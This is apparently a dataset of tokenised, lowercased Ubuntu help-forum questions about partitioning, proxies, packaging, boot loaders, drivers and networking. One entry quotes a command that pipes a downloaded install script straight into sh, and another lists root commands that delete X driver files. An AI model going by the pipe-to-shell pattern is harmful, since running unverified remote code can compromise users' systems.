202345	trying to setup multiple primary partitions on ubuntu linux	i currently have ubuntu desktop installed on a hard disk . i want to partition the hard disk so that i can reserve 30gb for ubuntu server and 30gb for ubuntu desktop . the drive has 300gb available . right now i am booting from dvd drive and installing ubuntu server . i selected `` guided partitioning '' and created a 30gb primary partition of ext4 journaling filesystem , set `` yes , format it '' for format partition and set bootable flag to on . i intend to use this 30 gig partition to hold ubuntu server and allow me to boot from it . now i have two other partitions . they are both set to `` logical '' , one is currently using 285.8 gigs and is using ext4 ( when i try to set bootable flag to true , it gives a warning `` you are trying to set the bootable flag on a logical partition . the bootable flag is only useful on the primary partitions '' ) . more alarming it says `` no existing file system was detected in this partition '' . actually , im thinking that this is the partition that is supposed to be holding my current ubuntu desktop . and of course i want this to be bootable and be a primary partition , so i could dual boot from this and the server partition . now the third partition is also set to logical and it is being used as swap area . how do i switch the second partition to primary and to make sure that its pointing to my existing desktop installation ?
202346	how to use global proxy settings for direct connection	i use a proxy server with ldap authentication for accessing internet . so i need to manually add server address and port in every application that has to connect to internet . any methods by which i dont need to enter proxy address in my applications ? ( i have entered the authentication and proxy details at : apt.conf and changed the environment variables too . firefox still asks for username pwd every time i connect )
202350	backtrack installation interrupted once , installed another time	i installed backtrack 5 from a live cd yesterday and while installing , i closed my laptop to let it run while i sleep . but then i remembered my friend told me the plastic of his computer melted this way , so i opened it again . it put it on power save , and somehow the installation was interrupted . the day after , i tried again and this time it worked . now , i have a grub menu with win7 and twice the ubuntu + safe mode or whatever it 's called . how can i remove the failed installation without deleting win7 or the successful installation ? normally i would use easybcd and delete the partitions , but this time i could n't start backtrack then . thanks in advance bernard
202351	always purge on remove in package	i am maintaining a debian package , which includes some config files that are installed under /etc/ . is there a way i can somehow make the package to always automatically -- purge itself whenever a user does a regular apt-get remove mypackage ? the reason is that i have some config files in /etc that should really be removed when the binaries are removed , otherwise it can lead to weird behavior . however i still want to treat them as conf files , i.e . make sure apt does not just wipe them on every upgrade of the package . but they should be removed when the package is uninstalled . currently i am manually deleting the /etc conf files in my postrm script . however i just found out that this has a unfortunate side effect : if the user uninstalls and then later re-installs the package , the conf files wo n't be reinstalled , because apt thinks that they are still there . so is there a way i can manually trigger a full 'purge ' in my postrm , such that apt knows that the conf files are gone ?
202355	how to play a fixed frequency sound using python	i have tried a number of ways of playing a fixed frequency sound ( e.g . 1000hz ) and nothing works . i have downloaded `` beep '' and that makes no noise . i tried interfacing to pyao , and that had no effect . i tried interfacing to audiere , and get a runtime error indicating the library could not be found , despite installing it from the software centre . any guidance for installation of appropriate libraries and relevant code would be most appreciated . i can not generate .mp3/ .wav files for this , but need to generate the tones at run time . many thanks for you
202358	what is the best open source middleware for ubuntu ?	i 'm looking for best middlewire software for ubuntu ( like jboss for redhat ) . i need a middlewire for deploying ubuntu on enterprise environment . hope this answer gon na be helpful for many people .
202374	install ubuntu12.04 with iso file using grub in usb disk	download the latest vmlinuz and initrd from http : //archive.ubuntu.com/ubuntu/dists/precise/main/installer-amd64/current/images/hd-media/ i put the ubuntu-12.04.1-server-amd64.iso to the /software ( in my usb disk ) and put the vmlinuz and the initrd files to the / ( in my usb disk ) the menu.lst for grub : title install ubuntu server 12.04 64bit root kernel /vmlinuz boot=install iso-scan/filename=/software/ubuntu-12.04.1-server-amd64.iso ro quiet initrd /initrd.gz i have install ubuntu server 11.10 successfully with grub for dos , but in ubuntu server 12.04 , there are some wrongs : i have boot it , and choose the language , when i click `` next '' , it was detecting devices , then got a wrong : ca n't find any iso file to install
202377	how to convert rpm package to a format meaningful to ubuntu	i 'm using a special program that has only .rpm version available as installer . as i need to run it on ubuntu , is there a way to install it in ubuntu ?
202378	continue with out a default route ?	i am doing a complete unattended install of ubuntu 12.04 . i am doing static network configuration . here is content for static network configuration from the preseed file . d-i netcfg/disable_dhcp boolean true d-i netcfg/no_default_route boolean true d-i netcfg/get_nameservers string 192.168.1.254 d-i netcfg/get_ipaddress string 192.168.1.13 d-i netcfg/get_netmask string 255.255.255.0 d-i netcfg/get_gateway string 192.168.1.1 d-i netcfg/confirm_static boolean true still is asking `` continue without a default route ? '' . i have to say , then only installed is going ahead . am passing preseed file via network ( preseed/url ) . how to avoid this manual intervention ? does the order of netcfg statements matter ?
202389	per user fonts.conf file	in kubuntu 12.04 using man fonts.conf i read : ~/.fonts.conf is the conventional location for per-user font configuration , although the actual location is specified in the global fonts.conf file . but in /etc/fonts/fonts.conf i can not find any settings giving me that local conf file path . i am asking this , because in 12.10 the same command give me : reading configurations from ~/.fonts.conf is deprecated so i want to read user font conf file location from the global conf file .
202391	bash script to take screenshot and save the image - ubuntu	i wrote a bash script as below : # ! /bin/bash echo `` enter a file name '' read filename import -window root $ home/desktop/ $ filename.png i expected this script to take a screen shot and save the image with the given filename on my desktop . problem : my ubuntu terminal is giving error : import : command not found
202402	why does the host key verification fail in `` connect to server '' utility ?	i am able to use ssh from terminal but i am not able to use it from `` connect to server.. '' utility . it is showing the error in the dialog box as below : can not display location `` sftp : //username @ ip.ip.ip.ip : port/ '' host key verification failed '' why so ? from terminal using below command i am able to access the server : ubuntu # ssh -p 2222 username @ ip.ip.ip.ip description : ubuntu 10.04.4 lts release : 10.04 codename : lucid why is the host key verification failing ?
202404	lirc : how to enable changes in /etc/lirc/lircrc without reboot	i have installed lirc , and i want to use irexec to control my music player daemon ( mpd ) using mpc commands from my mce remote control . works fine , except for one thing : if i want to edit the /etc/lirc/lircrc file to map the remote control buttons to commands , i need to reboot in order to read in and use the edited lircrc button/command definition file . to test things out is then a rather painful and time consuming experience . /etc/init.d/lirc restart does not do the trick , it just makes the remote stop working . function returns after reboot . what elese needs to be restarted ? or should i use some other method ? bn
202405	drag and drop files from browser to libreoffice writer not working	i tried to drag and drop an image on unity bar hoping that it will bring libreoffice writer in focus but it did n't not . so now i have to goto insert -- - > pictures how to solve this issue .
202407	low speed with gsm mobile on ubuntu	i use nokia 5200 mobile for internet but its speed in ubuntu is very low as compared to that of windows xp . pls help me how to increase net speed .
202409	system configuration problem	i 'm using ubuntu on my computer for the first time and i 'm having problem with system configuration . first i choose language , then accept licence agreement , then choose where i am , then i choose keyboard layout and when i put information about who i am ( name , username and log in automatically ) i ca n't go forward ? ? ? i 'm really confused , can anyone help me , what did i do wrong ?
202411	ca n't install ubuntu under windows 7 using wubi ?	i am new to linux . i want help related to my dell laptop on which i want to install ubuntu 12.04 lts within windows 7 . the problem happens when i select the option in installer to *install ubuntu 12.04 within win7* , after selecting this option the installer closes and command prompt massage appears showing `` attempting to terminating everything '' then my cd drive is opens and the installation is closes . i have 500 gb hardisk .
202412	geany can not run file built by g++ on kubuntu	i used geany and g++ on ubuntu , they were working just fine . but now i just installed kubuntu , and geany just does n't work as usual . geany builds and compiles with g++ , but it can not run the file . what i see is a blank console screen every time i ran a cxx file . geany commands : compile : g++ -wall -c `` % f '' build : g++ -wall -o `` % e '' `` % f '' excute : `` ./ % e ''
202416	how to give control over keyboard back to x server after alt + sysrq + r trick	situation : an application freezes the x server and no keyboard input works . so i use alt+sysrq+r to take the keyboard out of raw mode ( make the kernel take control of the keyboard away from the x server ) . i can then type ctrl+alt+f1 , kill the bad processes , and everything works again . so far so good . but the keyboard is still in the hands of the kernel , making alt+left/right shortcuts for decr_console/incr_console . this is annoying , and i want to give control over the keyboard back to the x server . i have tried typing alt+sysrq+r again , this does not switch things back . i have also tried the command kbd_mode -u , but nothing changes . any advice ?
202420	tail stops displaying in case of a log rotation	i have to tail the log of a server ( servicemix ) and the log rotation is enabled . as soon as the rotation happens , tail stops displaying . i did some investigations and it is a bug in debian : debian bug report . the bug has been around for a long time ago . does anyone knows if this bug in ubuntu is to be fixed ? i 'm on ubuntu 12.04 64 bit . i do n't have to mention that this bug is total hell ! every time i have the problem , i have to interrupt the command tail and re-execute the command !
202426	bluetooth adapter turned from working fine to unrecognized	i had been using bluetooth fine , with devices working , but today when i turned on my computer again bluetooth strangely failed . there is a bluetooth icon on the top bar , showing `` bluetooth on '' , but if i click on the `` bluetooth settings '' item , a system settings window shows up and shows me a bluetooth on-off switch which is disabled ( i.e . fixed to off ) . more information about my case : i am a new linux used , coming from windows , and do not know supposedly-obvious commands . i am using a laptop . it initially does n't have bluetooth . i bought a built-in type ( instead of usb type ) bluetooth module , and added it inside the laptop . hence , i do not have a specific fn+* key for bluetooth . in windows , i needed to install an additional driver that was intended for other machines in my laptop 's seires which have built-in ( i.e . factoryly built-in ) j bluetooth modules . the fn+* key seemed to only affect wifi under ubuntu . i have been successfully using magicmouse with my later-added built-in bluetooth module/adapter on both windows and ubuntu i have been trying to tweak the magicmouse scrolling speed with commands rmmod something , modprobe hid_magicmouse -- scroll_speed=45 -- scroll_acceleration=30 or something , then added a file `/etc/modprobe.d/magicmouse.conf '' . the mouse seemed to be working fine with these changes . now if i run commands like hcitool dev , the shell tells me that i do not have any `` devices '' or `` adapters '' . i seem to have bluez installed , because when i type `` blue '' then tab-autocomplete , a bunch of commands like bluez-test-device pops up . -- update -- some commands and their results : easoncxz @ eason-aspire-4741-ubuntu : /etc $ hcitool dev devices : easoncxz @ eason-aspire-4741-ubuntu : /etc $ hcitool scan device is not available : no such device easoncxz @ eason-aspire-4741-ubuntu : /etc $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : no hard blocked : no 2 : acer-bluetooth : bluetooth soft blocked : no hard blocked : no easoncxz @ eason-aspire-4741-ubuntu : /etc $ rfkill list 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 1 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 2 : acer-bluetooth : bluetooth soft blocked : yes hard blocked : no
202429	how to change port number utorrent in ubuntu ?	i just installing utorrent in ubuntu but i want to change the port number localhost:8080 to localhost:8085 because my apache geronimo server using that port number . can i change the port number ? thanks .
202430	will ubuntu support subversion1.7 and when will it be ?	since svn is the most widely used centralized source collaboration repository : are there plans for supporting the current version ( 1.7 ) out of the box in the near future ?
202433	is there nautilus 3.6.1 ( deb ) binary ?	i 'm looking for nautilus 3.6.1 deb package for ubuntu , and i was n't able to compile it 's source . how can i compile nautilus ? thanks..
202434	does 12.10 have integration with amazon ?	does ubuntu 12.10 have integration with amazon ? i refer to shopping suggestions from amazon will be plonked into desktop search results , shown when users attempt to find stuff on their computers and the local network .
202444	wlan drivers not preinstalled ! wifi 5100agn do not working	i am a total newbie on ubuntu ( linux ) . i had installed three distributions and now i decided for ubuntu . okay . but on every distribution my wlan adapater doesnt work well . my os dont recognize the wlan adapter and there are n't any drivers . so i decided to search some drivers for linux . the wlan chip is an intel wifi 5100agn . i found it on http : //intellinuxwireless.org/ the download : http : //intellinuxwireless.org/ ? n=downloads now , i have no plan how i could install the tar.gz i had googled for installation tips but it doesnt function . could anybody give me some advices for installing this tar.gz ? thanks ! chris
202445	how to monitor swap activity on desktop in real time ( preferrably separately for each swap device )	it would be informative to know in real-time the swap activity ( number of reads and writes per minute or similar measure ) . i intend to use it with conky . i can gather similar statistics by vmstat or agregate output of iotop . unfortunately i can not learn about the activity specifically on each swap device . the swapon command does n't provide such answer and neither do /proc/swaps . ( i use zram swap , so the moment when swapping occurs is not immediately obvious . and since zram swap makes penalty for cpu i would like to know if it happens when i start long computations. )
202451	fetching error when installing heroku	i tried to install heroku in ubuntu using this script wget -qo- https : //toolbelt.heroku.com/install-ubuntu.sh | sh and i get this error while installing heroku-toolbelt package failed to fetch http : //toolbelt.heroku.com/ubuntu/./foreman-0.60.0.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i tried to download `` http : //toolbelt.heroku.com/ubuntu/./foreman-0.60.0.deb '' manually to /var/cache/apt/archives/ but did n't work with the same error . any ideas to get this thing installed ?
202452	why is my laptop keyboard messed up after plugging an external keyboard ?	i 'm running xubuntu 12.04 on a 2007 macbook . i 'm using the laptop with external screen , keyboard and mouse . yesterday after a dist-upgrade and after i unplugged the external keyboard i noticed that the lapotop 's keyboard was mapped to whatever ( j = 1 , l = 3 , m = 0 e.t.c . ) however i can login and type perfectly in the login screen and as a guest . any suggestions on how to get more information and/or troubleshooting are welcome .
202456	questions about remapping keys	i have a couple of questions about remapping keys et al . how to interpret the output of the command xmodmap -pk . i put in xmodmap -pk | less and try to browse for the key i am looking for . here 's a sample line from the output : 94 0x003c ( less ) 0x003e ( greater ) 0x003c ( less ) 0x003e ( greater ) 0x007c ( bar ) 0x00a6 ( brokenbar ) 0x007c ( bar ) as i understand , this corresponds to the entry for keycode 94 . what i do n't understand is why are there 7 entries against this key ? what do they mean ? how does one find a key on the keyboard whose keycode is a given number ? i 'd appreciate an elegant way of doing this . for instance , there is always this dirty trick of punching in the keys with xev running ... i am looking for an answer that would explain how the keycodes are assigned to the keys in this case . i want to remap the key with keycode 94 to backslash and shift + the key to bar . can you guys please help me ?
202459	keyboard shortcut for pasting on the gnome terminal	we use ctrl+v to paste stuff from clip board . but this is not working on terminal window . what is the keyboard shortcut to paste on the gnome terminal ?
202460	i accidentally xkilled the terminal that was running an upgrade , now what ?	i was upgrading my 12.04 to 12.10 today with terminal ; and my thunderbird stopped working . i opened the terminal and opened xkill , but i unfortunately clicked on terminal by a mistake . now my computer says that 12.04 installed ; ( it was setting up the packages when that happened ) and do n't see 12.10 when i say upgrade . any suggestions ?
202477	apt-get upgrade fails for x11 due to some strange templates error	i am using ubuntu 10.04.4 lts on my dell vostro 1400 laptop . today afternoon when i ran sudo apt-get upgrade i got a error . googled for it , but there was no particular workarounds suggested for it . heres the error : ubuntu @ ubuntu-laptop : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 280 not upgraded . 2 not fully installed or removed . after this operation , 0b of additional disk space will be used . setting up x11-common ( 1:7.6+8~bpo60+1 ) ... template parse error near `choices-sr @ latin.utf-8 : samo glavni korisnik , samo za korisnike konzole , svako ' , in stanza # 1 of /var/lib/dpkg/info/x11-common.templates dpkg : error processing x11-common ( -- configure ) : subprocess installed post-installation script returned error exit status 9 dpkg : dependency problems prevent configuration of xserver-common : xserver-common depends on x11-common ; however : package x11-common is not configured yet . dpkg : error processing xserver-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : x11-common xserver-common e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ubuntu @ ubuntu-laptop : ~ $ any ideas on what could be the issue ?
202479	how to launch firefox browser in kubuntu ?	i 'm having the same problem with 12.04.01 as eeesy in a previous post . i use the link in kubuntu to invoke the installer to 'install mozilla firefox browser . ' ( by 'invoking the installer ' i mean k menu -- > applications -- > internet -- > 'mozilla firefox browser installer ' ) i go through the installation dialogue boxes , and it indicates package successfully installed . after this , i do not seem to be able to locate the link to firefox . ( i have tried : which firefox and which firefox , neither of which result in a path . ) i have also tried : sudo apt-get install firefox [ sudo ] password for chphunk : reading package lists ... done building dependency tree reading state information ... done package firefox is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'firefox ' has no installation candidate when i browse the muon software center , it shows firefox web browser as installed . when i select 'more info ' , it indicates 'find in the menu : k -- > applications -- > internet -- > mozilla firefox browser installer . i just want to run firefox . can you offer any guidance here ? thanks in advance .
202482	gparted resize failed , ca n't restore superblock	i tried to resize my data partition with gparted , from a ubuntu 12.04 live usb . i then accidentally closed my laptop screen , which caused ubuntu to hibernate . after i tried to get it back up , the screen kept black and the hdd indicator did n't blink . i then rebooted ( again to my live usb ) . gparted shows now that the partition is of the desired size , but it ca n't detect the filesystem . i found out that the superblock went bad , and tried the instructions found here . after trying all superblock backups ( 16 ) , i am still stuck . can anyone help me with the next step ?
202483	12.10 has python 3.2.3 default , does this impact existing python tools ?	ubuntu 12.10 has python 3.2.3 default , so does this impact existing python tools , designed to be used with older python 2.x ? there was a discussion in hackernews on the same . i 'm a bit apprehensive now to guide someone in python world moving to latest 12.10 for the reason it comes with python3.2 i 'm currently installing 12.10 from 12.04 . can i work side by side on python versions 2.x and 3.x without breaking the system ? thanks .
202484	reset network configuration in ubuntu 12.04	my dsl internet did not connect by network-manager ! so i tried to use sudo pppoeconf and my laptop connect to internet successfully . after that my problems are started ! first of all network-manager does not run in start up ! i try sudo nm-applet and get ** ( nm-applet:4966 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files ** message : applet now removed from the notification area ** ( nm-applet:4966 ) : warning ** : failed to register as an agent : ( 2 ) the name org.freedesktop.networkmanager was not provided by any .service files ** message : using fallback from indicator to gtkstatusicon ** message : starting applet secret agent because gnome shell disappeared ** ( nm-applet:4966 ) : warning ** : failed to register as an agent : ( 2 ) the name org.freedesktop.networkmanager was not provided by any .service files and i try sudo /etc/init.d/networking start , which i gain rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service networking start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start networking any after i try service networking start start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.71 '' ( uid=1000 pid=3624 comm= '' start networking `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) this is my /etc/ppp/peers/dsl-provider noipdefault usepeerdns hide-password lcp-echo-interval 20 lcp-echo-failure 3 connect /bin/true noauth persist mtu 1485 noaccomp default-asyncmap plugin rp-pppoe.so eth0 user `` 511 '' this is my /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp # manual auto dsl-provider iface dsl-provider inet ppp provider dsl-provider and this is my /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false the problem is to reverse this process ! and bring back nm-applet to my desktop again ! i need networkmanager to share my dsl internet through my modem . so i have two question : first , is there any way that i can reconfigure my network like before running sudo pppoeconf ? second , if there is not any way to bring networkmanager to my desktop , how can i share my internet without networkmanager ? thanks in advance
202488	error installing python wrapper for openkinect	i tried to install python wrappers for openkinect on ubuntu 12.04 , but i ca n't due this error : $ sudo apt-get install python2.7-dev python2.7-dev : depends : libexpat1-dev but it is not going to be installed depends : libssl-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . python wrapper requires these dependencies : cython python-dev ( error above ) python-numpy how can i install python-dev ?
202490	how can i see indicator-sync in lxpanel ?	i 've installed indicator-sync ( universe ) but he does n't appear in the panel . how can i fix that ?
202494	can not boot `` no suitable module for running kernel	i was trying to install sql in ubuntu 12.04 . but instead of installing i made some uninstalling operation . so while the process is going i closed my terminal window . so now when i restarted my laptop it showing `` no suitable module for running kernal found - fail '' my laptop dont have dvd drive . and i dont want to format my hard disk , because i have my family pictures . i need to recover my files . please help me . i am struggling for more than a week .
202496	how to be warned if raid 1 fails on ubuntu 10.04	good day , i have set up an ubuntu 10.04 lts server with raid 1 . how can i can ensure that i am warned when the raid array fails . is there a script to run that can check this and generate an email if there are issues ? regards
202497	2 windows loaders after grub2 repair	i have recently reinstalled w7 and had ubuntu 12.04 lts installed on it , w7 installation deleted the grub2 loader , after that i found solution to use boot-repair from live-cd session , but ... ... now i have 2 windows 7 ( loader ) in grub loader , and only 1 windows 7 installation , how can i remove it ? one is on on /dev/sda1 ( which should be w7 sistem reserved partition ) and second is on on /dev/sda2 ( which is w7 installment partition ) it says and both log on same w7.all i need is to remove it without brake the grub2 again and if someone is willing to guide me to add windows on primary selection , cause my girlfriends doesnt get along with linux : d. boot info url : http : //paste.ubuntu.com/1291403
202505	thunderbird filling up gbs of disk space	i have dedicated 5gb of space for my home folder . i have 6 email boxes and when i add them to thunderbird it downloads everything from them and fills up the whole home folder ( 3-4gb ) . this is unacceptable . i need to be able to limit its cache , i do n't need all of the emails downloaded , just the new ones . i tried setting lower space at edit - > preferences - > advanced - > network & disk space but it does not work , it again downloads 3-4gb of messages ... how do i limit it to 100-200mb ?
202512	is ubuntu 12.10 really released today ?	i do n't see any mention in the home page ubuntu.com . i found the cd image at http : //releases.ubuntu.com . is this the final one ? can i proceed downloading . update manager too does n't show up new version yet .
202513	stuck at unity2d , intel video borked , discrete nvidia seems to work ( bumblebee set up )	i 've been stuck with unity 2d all day at 1024x768 , tried all sorts of workarounds to no avail . my issues started when i upgraded to mesa9.0 in the ubuntu-x-swat/x-updates ppa . after a reboot , i was kicked in unity2d and could n't get 3d to work again . i downgraded all packages manually to 8.0.4 hoping this would solve the issue , but it did n't . i 've been through all topics on askubuntu and ubuntu forums , followed all advise i could find and still nothing . my system seems to be in a state of flux which i ca n't get out of . tl ; dr ; solution after struggling for hours on end on this one , i finally stumbled upon a bug report for centos where someone was having similar issues . it turns out that during an apt-get upgrade , a package ( i really can not tell which ) added nomodeset as as option to grub_cmdline_linux_default in /etc/default/grub . once that was removed ( oddly there was a vga=1 as well , got rid of that too ) , the intel drivers work as expected again . i will attempt another upgrade to mesa 9 over the weekend , hopefully it wo n't lead me straight back to this thread . i tried pretty much everything i could find : $ _ apt-get purge 'bumblebee* ' 'nvidia-current* ' 'nvidia-settings*' $ _ reboot $ _ apt-get install libgl1-mesa-dri libgl1-mesa-dri : i386 libgl1-mesa-dev mesa-common-dev libgl1-mesa-glx : i386 libgl1-mesa-glx libglapi-mesa libglapi-mesa : i386 libgles2-mesa libgles1-mesa libegl1-mesa-drivers libopenvg1-mesa libegl1-mesa libosmesa6 : i386 libosmesa6 libdrm-nouveau1a libdrm-nouveau1a : i386 xserver-xorg-core libdrm-dev libdrm2 libdrm2 : i386 libdrm-radeon1 libdrm-radeon1 : i386 libdrm-nouveau1a libdrm-nouveau1a : i386 libdrm-intel1 : i386 libdrm-intel1 libkms1 libgbm1 -- reinstall $ _ reboot $ _ rm -f /usr/lib/xorg/modules/extensions/libglx.so* /usr/lib/xorg/modules/extensions/nvidia_drv.so $ _ reboot $ _ rm /etc/x11/xorg.conf $ _ reboot $ _ apt-get install bumblebee so essentially , i purged everything , re-installed everything and still nothing . i followed the advise in enable hardware-accelerated desktop effects with nvidia optimus/bumblebee : $ ls -l /usr/lib/x86_64-linux-gnu/xorg/extra-modules lrwxrwxrwx 1 root root 53 oct 18 17:58 /usr/lib/x86_64-linux-gnu/xorg/extra-modules - > /etc/alternatives/x86_64-linux-gnu_xorg_extra_modules $ ls -l /etc/alternatives/x86_64-linux-gnu_xorg_extra_modules lrwxrwxrwx 1 root root 48 oct 18 17:58 /etc/alternatives/x86_64-linux-gnu_xorg_extra_modules - > /usr/lib/x86_64-linux-gnu/xorg/x11-extra-modules $ ls -l /usr/lib/x86_64-linux-gnu/xorg/x11-extra-modules total 0 $ uname -a linux stan-inspiron 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' $ update-alternatives -- display x86_64-linux-gnu_gl_conf x86_64-linux-gnu_gl_conf - manual mode link currently points to /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf /usr/lib/nvidia-current/ld.so.conf - priority 9700 slave x86_64-linux-gnu_grub_fb_blacklist : /usr/share/nvidia-current/nvidia-current.grub-gfxpayload slave x86_64-linux-gnu_libopencl.so : /usr/lib/nvidia-current/libopencl.so slave x86_64-linux-gnu_libopencl.so_lib32 : /usr/lib32/nvidia-current/libopencl.so slave x86_64-linux-gnu_libvdpau_nvidia.so : /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so slave x86_64-linux-gnu_libvdpau_nvidia.so.1 : /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so.1 slave x86_64-linux-gnu_libvdpau_nvidia.so.1_lib32 : /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so.1 slave x86_64-linux-gnu_libvdpau_nvidia.so_lib32 : /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so slave x86_64-linux-gnu_man_nvidiaxconfig.gz : /usr/share/man/man1/alt-nvidia-current-xconfig.1.gz slave x86_64-linux-gnu_nvidia-autostart.desktop : /usr/share/nvidia-current/nvidia-autostart.desktop slave x86_64-linux-gnu_nvidia-smi.1.gz : /usr/share/man/man1/alt-nvidia-current-smi.1.gz slave x86_64-linux-gnu_nvidia.icd : /usr/share/nvidia-current/nvidia.icd slave x86_64-linux-gnu_nvidia_bug_report : /usr/lib/nvidia-current/bin/nvidia-bug-report.sh slave x86_64-linux-gnu_nvidia_desktop : /usr/share/nvidia-current/ubuntu-nvidia-settings.desktop slave x86_64-linux-gnu_nvidia_drv : /usr/lib/nvidia-current/xorg/nvidia_drv.so slave x86_64-linux-gnu_nvidia_modconf : /lib/nvidia-current/modprobe.conf slave x86_64-linux-gnu_nvidia_smi : /usr/lib/nvidia-current/bin/nvidia-smi slave x86_64-linux-gnu_nvidia_xconfig : /usr/lib/nvidia-current/bin/nvidia-xconfig slave x86_64-linux-gnu_xorg_extra_modules : /usr/lib/nvidia-current/xorg slave x86_64-linux-gnu_xvmcconfig : /usr/lib/nvidia-current/xvmcconfig /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf - priority 500 slave x86_64-linux-gnu_xorg_extra_modules : /usr/lib/x86_64-linux-gnu/xorg/x11-extra-modules current 'best ' version is '/usr/lib/nvidia-current/ld.so.conf ' . $ libgl_debug=verbose /usr/lib/nux/unity_support_test -p libgl : screen 0 does not appear to be dri2 capable libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/stan/.drirc : no such file or directory . opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.4 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no $ lspci -vnn | grep '\ '' [ 030 [ 02 ] \ ] ' 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108 [ geforce gt 540m ] [ 10de:0df5 ] ( rev ff ) ( prog-if ff ) $ libgl_debug=verbose optirun /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce gt 525m/pcie/sse2 opengl version string : 4.2.0 nvidia 304.51 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no my thinking is that bumblebee is working as expected , however i am not able to make use of the intel video and it fallbacks to vesa . could anyone shed any light and possibly help me ? for fullness , here is the xorg.0.log file . edit 1 : i restored a back-up of my /etc directory from before the upgrade and compared all files againt their current version . there are no changes in any of the files in /etc/x11 so it leads me to think again it must be some library stuck somewhere causing mayhem . edit 2 : as suggested , xserver-xorg-core was re-installed : $ dpkg -s libglx.so nvidia-current : /usr/lib/nvidia-current/xorg/libglx.so nvidia-current : /usr/lib/nvidia-current/xorg/libglx.so.304.51 xserver-xorg-core : /usr/lib/xorg/modules/extensions/libglx.so $ _ apt-get install -- reinstall xserver-xorg-core reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 0 b/1,719 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 342599 files and directories currently installed . ) preparing to replace xserver-xorg-core 2:1.11.4-0ubuntu10.8 ( using ... /xserver-xorg-core_2 % 3a1.11.4-0ubuntu10.8_amd64.deb ) ... unpacking replacement xserver-xorg-core ... processing triggers for man-db ... setting up xserver-xorg-core ( 2:1.11.4-0ubuntu10.8 ) ... localepurge : disk space freed in /usr/share/locale : 0 kib localepurge : disk space freed in /usr/share/man : 0 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib total disk space freed by localepurge : 0 kib $ _ reboot $ libgl_debug=verbose glxgears libgl : screen 0 does not appear to be dri2 capable libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/stan/.drirc : no such file or directory . 8434 frames in 5.0 seconds = 1686.685 fps xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0 '' after 31148 requests ( 31148 known processed ) with 0 events remaining . $ _ updatedb $ locate libglx.so /usr/lib/nvidia-current/xorg/libglx.so /usr/lib/nvidia-current/xorg/libglx.so.304.51 /usr/lib/xorg/modules/extensions/libglx.so log files and issue experienced remain the same .
202514	how can i manage empathy ( online ) accounts in lubuntu 12.10 ?	i use empathy , but in lubuntu quantal , i can not add/manage accounts ... is there a workaround ?
202516	kernel tarball for 3.3.1	i use ubuntu 12.04 i changed kernel version to 3.3.1 . where can i find the kernel tarball ? ( to compile proprietary module ) thanks
